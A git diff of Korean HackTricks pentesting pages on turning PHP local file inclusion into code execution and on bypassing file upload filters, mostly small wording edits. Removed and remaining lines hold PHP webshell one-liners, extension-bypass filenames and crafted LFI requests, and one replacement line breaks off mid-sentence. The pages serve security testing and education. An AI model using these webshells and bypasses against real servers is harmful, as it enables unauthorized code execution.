+기본적으로 PHP에 파일이 업로드되면 (예상하지 않더라도) **`/tmp`**에 **`php[a-zA-Z0-9]{6}`**와 같은 이름의 임시 파일이 생성됩니다. 그러나 일부 도커 이미지에서는 생성된 파일에 숫자가 포함되지 않는 경우도 있었습니다.
 
 로컬 파일 포함에서 **업로드된 파일을 포함할 수 있다면 RCE를 얻을 수 있습니다**.
 
@@ -17,8 +17,8 @@ max_file_uploads = 20
 
 ### 다른 기술들
 
-다른 기술들은 PHP 프로토콜을 공격하는 데 의존합니다(경로의 마지막 부분만 제어할 경우에는 불가능합니다), 파일의 경로를 노출시키거나, 예상되는 파일을 악용하거나, **PHP가 세그멘테이션 오류를 겪게 하여 업로드된 임시 파일이 삭제되지 않도록 만드는 것입니다**.\
-이 기술은 **마지막 기술과 매우 유사하지만 제로 데이를 찾을 필요는 없습니다**.
+다른 기술들은 PHP 프로토콜을 공격하는 데 의존합니다(경로의 마지막 부분만 제어할 수 있다면 불가능합니다), 파일의 경로를 노출시키거나, 예상되는 파일을 악용하거나, **PHP가 세그멘테이션 오류를 겪게 하여 업로드된 임시 파일이 삭제되지 않도록 하는 것입니다**.\
+이 기술은 **마지막 기술과 매우 유사하지만 제로 데이를 찾을 필요가 없습니다**.
 
 ### 영원한 대기 기술
 
@@ -35,11 +35,11 @@ max_file_uploads = 20
 
 - 특정 파일이 존재해야 합니다(더 있을 수 있습니다).
 - **미친** 잠재적 파일 이름의 수: **56800235584**
-- 서버가 **숫자를 사용하지 않는 경우** 총 잠재적 수는: **19770609664**
+- 서버가 **숫자를 사용하지 않는다면** 총 잠재적 수는: **19770609664**
 - 기본적으로 **단일 요청**에서 **20개 파일만** 업로드할 수 있습니다.
 - 사용된 서버의 **최대 병렬 작업자 수**.
 - 이전의 제한과 함께 이 제한은 이 공격이 너무 오래 지속되게 만들 수 있습니다.
-- **PHP 요청의 타임아웃**. 이상적으로는 영원해야 하거나 임시로 업로드된 파일을 삭제하지 않고 PHP 프로세스를 종료해야 합니다. 그렇지 않으면 이것도 문제가 될 것입니다.
+- **PHP 요청의 타임아웃**. 이상적으로는 영원해야 하거나 임시로 업로드된 파일을 삭제하지 않고 PHP 프로세스를 종료해야 합니다. 그렇지 않으면 이것도 고통이 될 것입니다.
 
 그렇다면, 어떻게 **PHP 포함을 끝나지 않게 만들 수 있을까요**? 파일 **`/sys/kernel/security/apparmor/revision`**을 포함하기만 하면 됩니다 (**불행히도 Docker 컨테이너에서는 사용할 수 없습니다...**).
 
@@ -65,18 +65,18 @@ include("/sys/kernel/security/apparmor/revision");
 > [!WARNING]
 > 이전 예제에서 우리는 **다른 클라이언트를 완전히 DoS**하고 있다는 점에 유의하세요!
 
-Apache 서버가 개선되고 **4000개의 연결**을 남용할 수 있다면 (최대 수의 절반). 우리는 `3999*20 = 79980` **파일**을 생성할 수 있으며, **시간**은 약 **19.7시간** 또는 **6.9시간**으로 **줄어들** 것입니다 (10시간, 3.5시간 50% 확률).
+Apache 서버가 개선되고 **4000개의 연결**을 남용할 수 있다면 (최대 수의 절반). 우리는 `3999*20 = 79980` **파일**을 생성할 수 있으며 **시간**은 약 **19.7시간** 또는 **6.9시간**으로 **줄어들** 것입니다 (10시간, 3.5시간 50% 확률).
 
 ## PHP-FMP
 
-정상적인 php 모듈 대신 **웹 페이지가** **PHP-FMP**를 사용하여 PHP 스크립트를 실행하는 경우 (이것은 웹 페이지의 효율성을 향상시키므로 일반적으로 발견됩니다), 기술을 개선하기 위해 할 수 있는 다른 것이 있습니다.
+정상적인 php 모듈 대신 **웹 페이지가** **PHP-FMP**를 사용하여 PHP 스크립트를 실행하는 경우 (이것은 웹 페이지의 효율성을 향상시키므로 일반적으로 발견됩니다), 기술을 개선하기 위해 할 수 있는 다른 방법이 있습니다.
 
-PHP-FMP는 **`/etc/php/<php-version>/fpm/pool.d/www.conf`**에서 **매개변수** **`request_terminate_timeout`**을 **구성**할 수 있게 해줍니다.\
-이 매개변수는 **PHP에 대한 요청이 종료되어야 하는 최대 초 수**를 나타냅니다 (기본값은 무한하지만, **매개변수가 주석 해제되면 30초**). PHP가 요청을 처리하는 동안 지정된 초 수가 지나면, 요청이 **종료**됩니다. 이는 요청이 임시 파일을 업로드하고 있었던 경우, **PHP 처리가 중단되었기 때문에**, 해당 **파일이 삭제되지 않을 것**을 의미합니다. 따라서, 요청이 그 시간을 지속할 수 있다면, **삭제되지 않을 수천 개의 임시 파일을 생성**할 수 있으며, 이는 **파일을 찾는 과정을 가속화**하고 모든 연결을 소모하여 플랫폼에 대한 DoS 확률을 줄입니다.
+PHP-FMP는 **`/etc/php/<php-version>/fpm/pool.d/www.conf`**에서 **`request_terminate_timeout`** **매개변수**를 **구성**할 수 있게 해줍니다.\
+이 매개변수는 **PHP에 대한 요청이 종료되어야 하는 최대 초 수**를 나타냅니다 (기본적으로 무한하지만 **매개변수가 주석 해제되면 30초**). PHP가 요청을 처리하는 동안 지정된 초 수가 지나면, 요청이 **종료**됩니다. 이는 요청이 임시 파일을 업로드하고 있었던 경우, **PHP 처리가 중단되었기 때문에**, 해당 **파일이 삭제되지 않을 것**임을 의미합니다. 따라서 요청이 그 시간을 지속할 수 있다면, **삭제되지 않을 수천 개의 임시 파일을 생성**할 수 있으며, 이는 **파일을 찾는 과정을 가속화**하고 모든 연결을 소모하여 플랫폼에 대한 DoS 확률을 줄입니다.
 
 따라서 **DoS를 피하기 위해** 공격자가 동시에 **100개의 연결**만 사용할 것이라고 가정하고 php max 처리 시간은 **php-fmp**의 **`request_terminate_timeout`**이 **30초**라고 가정합니다. 따라서 **초당** 생성할 수 있는 **임시 파일**의 수는 `100*20/30 = 66.67`입니다.
 
-그런 다음, **10000개의 파일**을 생성하기 위해 공격자는: **`10000/66.67 = 150초`**가 필요합니다 ( **100000개의 파일**을 생성하는 데 걸리는 시간은 **25분**입니다).
+그런 다음, **10000개의 파일**을 생성하기 위해 공격자는: **`10000/66.67 = 150초`**가 필요합니다 ( **100000개의 파일**을 생성하는 데는 **25분**이 소요됩니다).
 
 그런 다음, 공격자는 이 **100개의 연결**을 사용하여 **브루트 포스 검색**을 수행할 수 있습니다. \*\*\*\* 300 req/s의 속도를 가정할 때, 이를 활용하는 데 필요한 시간은 다음과 같습니다:
 
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
index 68410af2f..c21f7e252 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
@@ -4,7 +4,7 @@
 
 ## Intro
 
-이 [**작성물**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)는 **php 필터를 사용하여 임의의 콘텐츠**를 출력으로 생성할 수 있음을 설명합니다. 이는 기본적으로 **파일에 작성할 필요 없이 임의의 php 코드를 생성**할 수 있음을 의미합니다.
+이 [**작성물**](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)는 **php 필터를 사용하여 임의의 콘텐츠**를 출력으로 생성할 수 있음을 설명합니다. 이는 기본적으로 **파일에 작성할 필요 없이** 포함할 **임의의 php 코드를 생성할 수 있음을 의미합니다**.
 
 기본적으로 스크립트의 목표는 **파일의 시작 부분에 Base64** 문자열을 **생성**하여 **최종적으로 디코딩**되어 원하는 페이로드를 **`include`에 의해 해석**되도록 하는 것입니다.
 
@@ -22,7 +22,7 @@
 5. php 코드를 얻기 위해 base64 디코딩합니다.
 
 > [!WARNING]
-> **Includes**는 일반적으로 **파일 끝에 ".php"를 추가**하는 작업을 수행하므로, 이를 악용하기 어렵게 만들 수 있습니다. 왜냐하면 당신은 익스플로잇을 죽이지 않는 콘텐츠를 가진 .php 파일을 찾아야 하기 때문입니다... 또는 **`php://temp`를 리소스로 사용할 수 있습니다**. 왜냐하면 이름에 **무엇이든 추가할 수 있기 때문입니다** (예: +".php") 그리고 여전히 익스플로잇이 작동하도록 허용합니다!
+> **포함**은 일반적으로 **파일 끝에 ".php"를 추가하는** 작업을 수행하므로, 이를 악용하기 어렵게 만들 수 있습니다. 왜냐하면 당신은 익스플로잇을 죽이지 않는 콘텐츠를 가진 .php 파일을 찾아야 하기 때문입니다... 또는 **`php://temp`를 리소스로 사용할 수 있습니다**. 왜냐하면 이름에 **무엇이든 추가할 수 있기 때문입니다** (예: +".php") 그리고 여전히 익스플로잇이 작동하도록 허용합니다!
 
 ## 결과 데이터에 접미사를 추가하는 방법
 
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index eff78699e..1266bcccf 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -10,7 +10,7 @@
 ```
 sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
 ```
-당신은 또한 **payload**를 익스플로잇의 시작 부분에서 변경해야 합니다(예: php-rev-shell용), **REQ1**(이것은 phpinfo 페이지를 가리켜야 하며 패딩이 포함되어야 합니다, 즉: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), 그리고 **LFIREQ**(이것은 LFI 취약점을 가리켜야 합니다, 즉: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ 널 문자 익스플로잇 시 더블 "%"를 확인하세요)
+당신은 또한 **payload**를 익스플로잇의 시작 부분에서 변경해야 합니다(예: php-rev-shell의 경우), **REQ1**(이것은 phpinfo 페이지를 가리켜야 하며 패딩이 포함되어야 합니다, 즉: _REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), 그리고 **LFIREQ**(이것은 LFI 취약점을 가리켜야 합니다, 즉: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ 널 문자 익스플로잇 시 이중 "%"를 확인하세요)
 
 {% file src="../../images/LFI-With-PHPInfo-Assistance.pdf" %}
 
@@ -22,11 +22,11 @@ PHP에서 업로드가 허용되면 파일을 업로드하려고 할 때, 이 
 
 **Windows**에서는 파일이 일반적으로 **C:\Windows\temp\php**에 저장됩니다.
 
-**Linux**에서는 파일 이름이 **random**이며 **/tmp**에 위치합니다. 이름이 무작위이기 때문에 **어딘가에서 임시 파일의 이름을 추출하고** 삭제되기 전에 접근해야 합니다. 이는 "**phpconfig()**" 함수의 내용 내에서 **변수 $\_FILES**의 값을 읽음으로써 수행할 수 있습니다.
+**Linux**에서는 파일 이름이 **무작위**이며 **/tmp**에 위치합니다. 이름이 무작위이기 때문에 **어딘가에서 임시 파일의 이름을 추출하고** 삭제되기 전에 접근해야 합니다. 이는 "**phpconfig()**" 함수의 내용 내에서 **변수 $\_FILES**의 값을 읽음으로써 수행할 수 있습니다.
 
 **phpinfo()**
 
-**PHP**는 **4096B**의 버퍼를 사용하며, 버퍼가 **가득 차면** 클라이언트에게 **전송됩니다**. 그런 다음 클라이언트는 **많은 큰 요청을 보낼 수 있습니다**(큰 헤더를 사용하여) **php** 리버스 **셸을 업로드하고**, **phpinfo()의 첫 번째 부분이 반환될 때까지 기다립니다**(임시 파일의 이름이 있는 곳) 그리고 LFI 취약점을 익스플로잇하여 php 서버가 파일을 삭제하기 전에 **임시 파일에 접근하려고 시도합니다**.
+**PHP**는 **4096B**의 버퍼를 사용하며, 버퍼가 **가득 차면** 클라이언트에게 **전송**됩니다. 그런 다음 클라이언트는 **많은 큰 요청**(큰 헤더를 사용하여) **php** 리버스 **셸을 업로드하고**, **phpinfo()의 첫 번째 부분이 반환될 때까지 기다린 후**(임시 파일의 이름이 있는 곳) **LFI 취약점을 익스플로잇하여 php 서버가 파일을 삭제하기 전에 임시 파일에 접근**하려고 시도할 수 있습니다.
 
 **이름을 브루트포스 시도하기 위한 Python 스크립트(길이 = 6)**
 ```python
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index c57c39e74..761b2b0b8 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -12,7 +12,7 @@ include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAA
 ```
 당신은 **파일**을 **포함하는** **POST** 요청을 **전송**하면 PHP가 해당 파일의 내용을 가진 **`/tmp/php<something>`**에 **임시 파일**을 생성한다는 것을 알아야 합니다. 이 파일은 요청이 처리되면 **자동으로 삭제**됩니다.
 
-**LFI**를 발견하고 PHP에서 세그멘테이션 오류를 **유발**하면 **임시 파일은 절대 삭제되지 않습니다**. 따라서 **LFI** 취약점을 사용하여 파일을 **검색**하고 임의의 코드를 실행할 수 있습니다.
+**LFI**를 발견하고 PHP에서 세그멘테이션 오류를 **유발**하면 **임시 파일은 절대 삭제되지 않습니다**. 따라서 **LFI** 취약점을 사용하여 파일을 **검색**하고 이를 찾아 임의의 코드를 실행할 수 있습니다.
 
 테스트를 위해 도커 이미지를 사용할 수 있습니다: [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0)
 ```python
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
index 4a579a52c..b9c7fb165 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
@@ -7,7 +7,7 @@
 **PHP** 엔진이 RFC 1867에 따라 형식화된 파일을 포함하는 **POST 요청**을 수신하면, 업로드된 데이터를 저장하기 위해 임시 파일을 생성합니다. 이러한 파일은 PHP 스크립트에서 파일 업로드 처리를 위해 중요합니다. 지속적인 저장이 필요할 경우, `move_uploaded_file` 함수를 사용하여 이러한 임시 파일을 원하는 위치로 이동해야 합니다. 실행 후, PHP는 남아 있는 임시 파일을 자동으로 삭제합니다.
 
 > [!NOTE]
-> **보안 경고: 임시 파일의 위치를 알고 있는 공격자는 업로드 중 파일에 접근하여 코드 실행을 위해 로컬 파일 포함 취약점을 악용할 수 있습니다.**
+> **보안 경고: 임시 파일의 위치를 알고 있는 공격자는 파일 업로드 중에 파일에 접근하여 코드 실행을 위해 로컬 파일 포함 취약점을 악용할 수 있습니다.**
 
 무단 접근의 도전 과제는 임시 파일의 이름을 예측하는 것으로, 이는 의도적으로 무작위화됩니다.
 
@@ -19,7 +19,7 @@ Windows에서 PHP는 `GetTempFileName` 함수를 사용하여 임시 파일 이
 - 접두사는 보통 "php"입니다.
 - `<uuuu>`는 고유한 16진수 값을 나타냅니다. 중요한 점은 함수의 제한으로 인해 하위 16비트만 사용되므로, 상수 경로와 접두사를 가진 최대 65,535개의 고유 이름이 가능하여 무차별 대입이 가능하다는 것입니다.
 
-또한, Windows 시스템에서의 악용 과정은 간소화됩니다. `FindFirstFile` 함수의 특이성으로 인해 로컬 파일 포함(LFI) 경로에서 와일드카드를 사용할 수 있습니다. 이를 통해 임시 파일을 찾기 위한 포함 경로를 다음과 같이 작성할 수 있습니다:
+게다가, Windows 시스템에서의 악용 과정은 간소화됩니다. `FindFirstFile` 함수의 특이성으로 인해 로컬 파일 포함(LFI) 경로에서 와일드카드를 사용할 수 있습니다. 이를 통해 임시 파일을 찾기 위한 포함 경로를 다음과 같이 작성할 수 있습니다:
 ```
 http://site/vuln.php?inc=c:\windows\temp\php<<
 ```
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index eda6e626e..c74cfd47f 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -2,11 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
+
 **Phar** 파일(PHP Archive) 파일은 **직렬화된 형식의 메타 데이터**를 포함하고 있으므로, 파싱될 때 이 **메타 데이터**는 **역직렬화**되고, **PHP** 코드 내에서 **역직렬화** 취약점을 악용할 수 있습니다.
 
-이 특성의 가장 좋은 점은 **file_get_contents(), fopen(), file() 또는 file_exists(), md5_file(), filemtime() 또는 filesize()**와 같이 PHP 코드를 평가하지 않는 PHP 함수를 사용하더라도 이 역직렬화가 발생한다는 것입니다.
+이 특성의 가장 좋은 점은 **file_get_contents(), fopen(), file() 또는 file_exists(), md5_file(), filemtime() 또는 filesize()**와 같이 PHP 코드를 eval하지 않는 PHP 함수를 사용하더라도 이 역직렬화가 발생한다는 것입니다.
 
-따라서, **`phar://`** 프로토콜을 사용하여 임의의 파일의 크기를 가져오는 PHP 웹이 있는 상황을 상상해 보십시오. 그리고 코드 내에서 다음과 유사한 **클래스**를 찾을 수 있습니다:
+따라서, **`phar://`** 프로토콜을 사용하여 임의의 파일의 크기를 가져오는 PHP 웹이 있는 상황을 상상해 보십시오. 그리고 코드 내에서 다음과 유사한 **class**를 찾을 수 있습니다:
 ```php:vunl.php
 <?php
 class AnyClass {
diff --git a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index d9c93bb8b..85b0a9692 100644
--- a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-세션이 없고 `session.auto_start`가 꺼져 있어도 **Local File Inclusion**을 발견한 경우, **`session.upload_progress.enabled`**가 **`On`**이고 **multipart POST** 데이터에 **`PHP_SESSION_UPLOAD_PROGRESS`**를 제공하면 PHP가 **세션을 활성화**합니다.
+세션이 없고 `session.auto_start`가 꺼져 있어도 **Local File Inclusion**을 발견한 경우, **`session.upload_progress.enabled`**가 **켜져** 있고 **multipart POST** 데이터에 **`PHP_SESSION_UPLOAD_PROGRESS`**를 제공하면 PHP가 **세션을 활성화**합니다.
 ```bash
 $ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
 $ ls -a /var/lib/php/sessions/
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index d285e24fb..07e735e63 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -2,6 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
 ## 파일 업로드 일반 방법론
 
 기타 유용한 확장자:
@@ -18,7 +19,7 @@
 ### 파일 확장자 검사 우회
 
 1. 적용되는 경우, **이전 확장자**를 **확인**합니다. 또한 **대문자**를 사용하여 테스트합니다: _pHp, .pHP5, .PhAr ..._
-2. _실행 확장자 **앞에 유효한 확장자를 추가** 확인합니다 (이전 확장자도 사용):_
+2. _실행 확장자 앞에 **유효한 확장자 추가** 확인 (이전 확장자도 사용):_
 - _file.png.php_
 - _file.png.Php5_
 3. **특수 문자를 끝에 추가**해 보십시오. Burp를 사용하여 모든 **ascii** 및 **Unicode** 문자를 **브루트포스**할 수 있습니다. (_이전의 **확장자**를 사용하여 더 나은 페이로드를 준비할 수도 있습니다._)
@@ -31,82 +32,7 @@
 - _file._
 - _file.php...._
 - _file.pHp5...._
-4. **서버 측의 확장자 파서를 속여** 보호를 우회해 보십시오. **확장자를 두 번** 추가하거나 **쓰레기** 데이터를 추가하는 기술을 사용할 수 있습니다. 
-- _file.png.php_
-- _file.png.pHp5_
-- _file.php#.png_
-- _file.php%00.png_
-- _file.php\x00.png_
-- _file.php%0a.png_
-- _file.php%0d%0a.png_
-- _file.phpJunk123png_
-5. 이전 검사에 **또 다른 확장자 레이어를 추가**합니다:
-- _file.png.jpg.php_
-- _file.php%00.png%00.jpg_
-6. **유효한 확장자 앞에 exec 확장자를 넣고** 서버가 잘못 구성되기를 기도합니다. (Apache 잘못 구성에서 유용하며, 확장자 **.php**로 끝나지 않더라도 코드를 실행합니다):
-- _ex: file.php.png_
-7. **Windows에서 NTFS 대체 데이터 스트림(ADS)** 사용. 이 경우, 금지된 확장자 뒤에 콜론 문자 “:”가 삽입되고 허용된 확장자 앞에 삽입됩니다. 결과적으로, **금지된 확장자를 가진 빈 파일**이 서버에 생성됩니다 (예: “file.asax:.jpg”). 이 파일은 나중에 다른 기술을 사용하여 편집할 수 있습니다. “**::$data**” 패턴을 사용하여 비어 있지 않은 파일을 생성할 수도 있습니다. 따라서 이 패턴 뒤에 점 문자를 추가하는 것도 추가 제한을 우회하는 데 유용할 수 있습니다 (예: “file.asp::$data.”)
-8. 파일 이름 제한을 **깨뜨려** 보십시오. 유효한 확장자가 잘리게 됩니다. 그리고 악성 PHP가 남게 됩니다. AAA<--SNIP-->AAA.php
-
-```
-# Linux 최대 255 바이트
-/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
-Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ab3Ab4Ab5Ab6Ab7Ab8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # 여기서 4를 빼고 .png 추가
-# 파일을 업로드하고 응답을 확인하여 허용되는 문자의 수를 확인합니다. 예를 들어 236
-python -c 'print "A" * 232'
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-# 페이로드 만들기
-AAA<--SNIP 232 A-->AAA.php.png
-```
-
-### Content-Type, 매직 넘버, 압축 및 크기 조정 우회
-
-- **Content-Type** 검사를 우회하려면 **Content-Type** **헤더**의 **값**을 다음으로 설정합니다: _image/png_, _text/plain_, application/octet-stream_
-1. Content-Type **단어 목록**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
-- 파일의 시작 부분에 **실제 이미지의 바이트**를 추가하여 **매직 넘버** 검사를 우회합니다 (파일 명령을 혼란스럽게 함). 또는 **메타데이터** 내에 쉘을 삽입합니다:\
-`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
-`\` 또는 이미지를 통해 **페이로드를 직접 삽입**할 수도 있습니다:\
-`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
-- **압축이 이미지에 추가되는 경우**, 예를 들어 [PHP-GD](https://www.php.net/manual/fr/book.image.php)와 같은 표준 PHP 라이브러리를 사용하는 경우, 이전 기술은 유용하지 않을 수 있습니다. 그러나 **PLTE 청크** [**여기 정의된 기술**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)을 사용하여 압축을 **견딜 수 있는** 텍스트를 삽입할 수 있습니다.
-- [**코드가 있는 Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
-- 웹 페이지가 **이미지의 크기를 조정**할 수도 있습니다. 예를 들어 PHP-GD 함수 `imagecopyresized` 또는 `imagecopyresampled`를 사용합니다. 그러나 **IDAT 청크** [**여기 정의된 기술**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)을 사용하여 압축을 **견딜 수 있는** 텍스트를 삽입할 수 있습니다.
-- [**코드가 있는 Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
-- PHP-GD 함수 `thumbnailImage`를 사용하여 **이미지 크기 조정을 견딜 수 있는** 페이로드를 만드는 또 다른 기술입니다. 그러나 **tEXt 청크** [**여기 정의된 기술**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)을 사용하여 압축을 **견딜 수 있는** 텍스트를 삽입할 수 있습니다.
-- [**코드가 있는 Github**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
-
-### 확인할 기타 트릭
-
-- 이미 업로드된 파일의 이름을 **변경**할 수 있는 취약점을 찾습니다 (확장자를 변경).
-- 백도어를 실행하기 위한 **로컬 파일 포함** 취약점을 찾습니다.
-- **정보 유출 가능성**:
-1. **동일한 파일**을 **여러 번** (그리고 **동시에**) **동일한 이름**으로 업로드합니다.
-2. **이미 존재하는** **파일** 또는 **폴더**의 **이름**으로 파일을 업로드합니다.
-3. **“.”, “..”, 또는 “…”**를 이름으로 가진 파일을 업로드합니다. 예를 들어, Apache에서 **Windows**의 경우, 애플리케이션이 업로드된 파일을 “/www/uploads/” 디렉토리에 저장하면, “.” 파일 이름은 “/www/” 디렉토리에 “uploads”라는 파일을 생성합니다.
-4. **NTFS**에서 쉽게 삭제되지 않을 수 있는 파일을 업로드합니다 (예: **“…:.jpg”**). (Windows)
-5. **Windows**에서 이름에 **잘못된 문자**가 포함된 파일을 업로드합니다 (예: `|<>*?”`). (Windows)
-6. **Windows**에서 **예약된** (**금지된**) **이름**으로 파일을 업로드합니다 (예: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9).
-- 또한 **실행 파일** (.exe) 또는 **.html** (덜 의심스러운) 파일을 업로드하여 피해자가 우연히 열었을 때 **코드를 실행**하도록 합니다.
-
-### 특수 확장자 트릭
-
-**PHP 서버**에 파일을 업로드하려는 경우, [코드를 실행하기 위한 **.htaccess** 트릭을 확인하십시오](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
-**ASP 서버**에 파일을 업로드하려는 경우, [코드를 실행하기 위한 **.config** 트릭을 확인하십시오](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
-
-`.phar` 파일은 Java의 `.jar`와 유사하지만 PHP용이며, **PHP 파일처럼 사용**될 수 있습니다 (PHP로 실행하거나 스크립트 내에 포함).
-
-`.inc` 확장자는 때때로 파일을 **가져오는 데만 사용되는** PHP 파일에 사용되므로, 누군가 이 확장자가 **실행되도록 허용했을 수 있습니다**.
-
-## **Jetty RCE**
-
-Jetty 서버에 XML 파일을 업로드할 수 있는 경우, [**새로운 \*.xml 및 \*.war가 자동으로 처리되기 때문에 RCE를 얻을 수 있습니다**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** 따라서 다음 이미지에서 언급된 대로 XML 파일을 `$JETTY_BASE/webapps/`에 업로드하고 셸을 기대하십시오!
-
-![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
-
-## **uWSGI RCE**
-
-이 취약점에 대한 자세한 탐색은 원본 연구를 확인하십시오: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
-
-원격 명령 실행(RCE) 취약점은 `.ini` 구성 파일을 수정할 수 있는 경우 uWSGI 서버에서 악용될 수 있습니다. uWSGI 구성 파일은 "매직" 변수, 자리 표시자 및 연산자를 포함하기 위해 특정 구문을 활용합니다. 특히, `@(filename)`으로 사용되는 '@' 연산자는 파일의 내용을 포함하도록 설계되었습니다. uWSGI에서 지원되는 다양한 스킴 중 "exec" 스킴은 특히 강력하여 프로세스의 표준 출력에서 데이터를 읽을 수 있습니다. 이 기능은 원격 명령 실행 또는 임의 파일 쓰기/읽기를 위해 악용될 수 있습니다.
+4. **서버 측의 확장자 파서를 속여** 보호를 우회해 보십시오. **확장자**를 **두 번** 추가하거나 **쓰레기** 데이터 (**null** 바이트)를 확장자 사이에 추가하는 기술을 사용할 수 있습니다. _이전의 **확장자
 ```ini
 [uwsgi]
 ; read from a symbol
@@ -130,8 +56,8 @@ uWSGI의 구성 파일 구문 분석의 느슨한 특성을 이해하는 것이
 
 ## **wget 파일 업로드/SSRF 트릭**
 
-일부 경우에 서버가 **`wget`**을 사용하여 **파일을 다운로드**하고 **URL**을 **지정**할 수 있는 경우가 있습니다. 이러한 경우, 코드는 다운로드된 파일의 확장자가 화이트리스트에 있는지 확인하여 허용된 파일만 다운로드되도록 보장할 수 있습니다. 그러나 **이 검사는 우회할 수 있습니다.**\
-**리눅스**에서 **파일 이름**의 **최대** 길이는 **255**자이지만, **wget**은 파일 이름을 **236**자로 잘라냅니다. **"A"\*232+".php"+".gif"**라는 파일을 **다운로드**할 수 있으며, 이 파일 이름은 **검사**를 **우회**합니다(이 예에서 **".gif"**는 **유효한** 확장자입니다) 그러나 `wget`은 파일 이름을 **"A"\*232+".php"**로 **변경**합니다.
+일부 경우, 서버가 **`wget`**을 사용하여 **파일을 다운로드**하고 **URL**을 **지정**할 수 있는 경우가 있습니다. 이러한 경우, 코드는 다운로드된 파일의 확장자가 화이트리스트에 있는지 확인하여 허용된 파일만 다운로드되도록 보장할 수 있습니다. 그러나 **이 검사는 우회할 수 있습니다.**\
